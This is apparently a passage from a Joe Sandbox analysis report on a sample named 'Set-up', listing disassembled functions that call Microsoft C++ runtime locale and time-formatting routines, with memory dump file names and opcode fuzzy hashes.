                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(00000000,?,?,00000028), ref: 6BC25B34
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25B3F
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC25B47
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: fb7a832357c66fc3b3fac837548ed73f67305298c58e74a6563461d2dcf99259
                                                                                              • Instruction ID: d128918539791d72d23e1dff30e7dbde99259402706fe5dccc50dd7c835ef5b4
                                                                                              • Opcode Fuzzy Hash: fb7a832357c66fc3b3fac837548ed73f67305298c58e74a6563461d2dcf99259
                                                                                              • Instruction Fuzzy Hash: D5F0A075926108EBDB10DFA4C50178CBBF0BF50709F10C01DA055A7240EB7C5B05CB90
                                                                                              Function 6BC25A20 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25A27
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,?,?,00000028), ref: 6BC25A51
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25A5C
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC25A64
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: 2cdca3787742f2b564648de4e4cb7efa2bb693a3050a7179a62b5a33bfdb0fb1
                                                                                              • Instruction ID: c142b37c360338ab87a3e2d7e4b7d50e4b9616389a3ef77fbaf9d7091c95571e
                                                                                              • Opcode Fuzzy Hash: 2cdca3787742f2b564648de4e4cb7efa2bb693a3050a7179a62b5a33bfdb0fb1
                                                                                              • Instruction Fuzzy Hash: 89F0E575926208DBD710DFA4C5127CCB7F06F50705F10841DA045A7240FB7C5B45CBA0
                                                                                              Function 6BC2996C Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29973
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028), ref: 6BC29993
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,00000028), ref: 6BC299A2
                                                                                                • Part of subcall function 6BC25809: __EH_prolog3_catch.LIBCMT ref: 6BC25810
                                                                                                • Part of subcall function 6BC25809: _Getcvt.MSVCP100(00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?), ref: 6BC2581A
                                                                                                • Part of subcall function 6BC25809: ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014), ref: 6BC25837
                                                                                                • Part of subcall function 6BC25809: _Maklocstr.LIBCPMT ref: 6BC2583D
                                                                                                • Part of subcall function 6BC25809: ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC2584D
                                                                                                • Part of subcall function 6BC25809: _Maklocstr.LIBCPMT ref: 6BC25853
                                                                                                • Part of subcall function 6BC25809: _Getdateorder.MSVCP100 ref: 6BC2585E
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC299AE
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$free$H_prolog3$??1_Maklocstr$??0_??0exception@std@@D@std@@@std@@@std@@ExceptionGetcvtGetdateorderGetdays@_Getmonths@_H_prolog3_catchInit@?$time_get@Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowU?$char_traits@V12@V12@@V?$istreambuf_iterator@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 2979494907-0
                                                                                              • Opcode ID: 839f1bc67831a509534da6850ea77e6f8bc5b5865b30f52edf376fd4df5d2087
                                                                                              • Instruction ID: e86025a11ec0344af54274a1461274b5e69faabf5daa78d82807e89ba88a8cf7
                                                                                              • Opcode Fuzzy Hash: 839f1bc67831a509534da6850ea77e6f8bc5b5865b30f52edf376fd4df5d2087
                                                                                              • Instruction Fuzzy Hash: 1DF03034926118EFDB04DFA8D1157DCBBF5AF54745F508059E445A7340EBB84B04DBA1
                                                                                              Function 6BC2593B Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25942
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,?,?,00000028), ref: 6BC2596C
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25977
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC2597F
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: e9d8846d50163d8a648dcccd933ed758b7a4a77ee818b42959932e220368181d
                                                                                              • Instruction ID: dbf90802d7e7c19f18dfd6a8bafc5622e38f0acac35cd90e350b2ed5cc9a452c
                                                                                              • Opcode Fuzzy Hash: e9d8846d50163d8a648dcccd933ed758b7a4a77ee818b42959932e220368181d
                                                                                              • Instruction Fuzzy Hash: EBF0E575925208DBD714DFA4C51278CB7F06F50719F10841DE049A7240FB7C5B45CBA0
                                                                                              Function 6BC29855 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2985C
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC2987E
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,00000028), ref: 6BC2988D
                                                                                                • Part of subcall function 6BC25809: __EH_prolog3_catch.LIBCMT ref: 6BC25810
                                                                                                • Part of subcall function 6BC25809: _Getcvt.MSVCP100(00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?), ref: 6BC2581A
                                                                                                • Part of subcall function 6BC25809: ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014), ref: 6BC25837
                                                                                                • Part of subcall function 6BC25809: _Maklocstr.LIBCPMT ref: 6BC2583D
                                                                                                • Part of subcall function 6BC25809: ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC2584D
                                                                                                • Part of subcall function 6BC25809: _Maklocstr.LIBCPMT ref: 6BC25853
                                                                                                • Part of subcall function 6BC25809: _Getdateorder.MSVCP100 ref: 6BC2585E
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC29899
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$free$H_prolog3$??1_Maklocstr$??0_??0exception@std@@D@std@@@std@@@std@@ExceptionGetcvtGetdateorderGetdays@_Getmonths@_H_prolog3_catchInit@?$time_get@Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowU?$char_traits@V12@V12@@V?$istreambuf_iterator@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 2979494907-0
                                                                                              • Opcode ID: 347983f1a1a2be9ca9a611c0da6d59f82f417c56dea1e76998f342cea3185e07
                                                                                              • Instruction ID: b3d24c198588183bb4ffa6266e7c613bd68b75c648449f53b63e009a09411d80
                                                                                              • Opcode Fuzzy Hash: 347983f1a1a2be9ca9a611c0da6d59f82f417c56dea1e76998f342cea3185e07
                                                                                              • Instruction Fuzzy Hash: 65F0A03892A118DBD700DFA8C1117CCBAF06F54305F108059A044A7340EBBC4B04DBA1
                                                                                              Function 6BC29F5C Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29F63
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028), ref: 6BC29F83
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,00000028), ref: 6BC29F92
                                                                                                • Part of subcall function 6BC25B5B: __EH_prolog3_catch.LIBCMT ref: 6BC25B62
                                                                                                • Part of subcall function 6BC25B5B: _Getcvt.MSVCP100(00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?), ref: 6BC25B6C
                                                                                                • Part of subcall function 6BC25B5B: ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014), ref: 6BC25B89
                                                                                                • Part of subcall function 6BC25B5B: _Maklocstr.LIBCPMT ref: 6BC25B8F
                                                                                                • Part of subcall function 6BC25B5B: ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC25B9F
                                                                                                • Part of subcall function 6BC25B5B: _Maklocstr.LIBCPMT ref: 6BC25BA5
                                                                                                • Part of subcall function 6BC25B5B: _Getdateorder.MSVCP100 ref: 6BC25BB0
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC29F9E
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$free$H_prolog3$??1_Maklocstr$??0_??0exception@std@@ExceptionGetcvtGetdateorderGetdays@_Getmonths@_H_prolog3_catchInit@?$time_get@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowU?$char_traits@_V12@V12@@V?$istreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 2040812796-0
                                                                                              • Opcode ID: 81bfa17f6cfd2a1d7b9d5f7605f27e95466cb5a3ca3799f242964942a57de5d0
                                                                                              • Instruction ID: 6c3b372fc758120990aa7724668a31a5453355a2688c1128e8d634ab327566a7
                                                                                              • Opcode Fuzzy Hash: 81bfa17f6cfd2a1d7b9d5f7605f27e95466cb5a3ca3799f242964942a57de5d0
                                                                                              • Instruction Fuzzy Hash: 89F03074926118EFDB04DFA8D1517DCBBF5AF54704F508459A445A7340EBB84B04DBA1
                                                                                              Function 6BC29E45 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29E4C
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC29E6E
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,00000028), ref: 6BC29E7D
                                                                                                • Part of subcall function 6BC25B5B: __EH_prolog3_catch.LIBCMT ref: 6BC25B62
                                                                                                • Part of subcall function 6BC25B5B: _Getcvt.MSVCP100(00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?), ref: 6BC25B6C
                                                                                                • Part of subcall function 6BC25B5B: ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014), ref: 6BC25B89
                                                                                                • Part of subcall function 6BC25B5B: _Maklocstr.LIBCPMT ref: 6BC25B8F
                                                                                                • Part of subcall function 6BC25B5B: ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC25B9F
                                                                                                • Part of subcall function 6BC25B5B: _Maklocstr.LIBCPMT ref: 6BC25BA5
                                                                                                • Part of subcall function 6BC25B5B: _Getdateorder.MSVCP100 ref: 6BC25BB0
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC29E89
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
